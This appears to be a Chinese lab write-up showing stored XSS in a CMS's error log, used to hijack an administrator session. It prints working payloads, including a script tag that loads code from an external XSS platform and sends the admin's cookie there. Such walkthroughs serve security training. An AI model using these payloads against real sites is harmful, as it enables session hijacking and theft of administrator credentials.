我们看到靶场使用的是CMSv5.3.0,于是上网搜索它存在的漏洞
具体漏洞解析如这篇文章所示https://www.freebuf.com/column/165269.html
我们这里利用错误日记插入存储型xss。当我们访问不存在的文件,页面时会产生错误。产生的错误会记录到错误日志里面,源码错误日记把记录的恶意语句没有过滤,当管理员在后台点击查看错误的日志时,存储型XSS就会触发。
我们这里先用自建环境运行试验一下
在url里输入如下命令,显示了弹窗,说明存在xss漏洞
http://127.0.0.1/index.php?c=mail&m=test<script>alert(/XSS/)</script>
并且页面跳转404,说明不存在文件
登录管理页面,管理员查看错误日志时会发现弹窗,这时存储型XSS已被触发
我们在XSSPT上使用一个极限代码如下,插入url中
<sCRiPt/SrC=//xsshs.cn/bXEW>
开发者工具中显示了一个存储型XSS的文件
登录管理员界面访问错误日志
再登录xsspt我们可以看到被打的cookie和网页其他相关信息
靶场
在这里操作步骤和搭建环境中实验情况类似,步骤不再赘述,不过我一直在xsspt打不到cookie,可能是boot的原因吧
最后用xsssh站点,选择老默认模块,按照原来步骤,最后打到cookie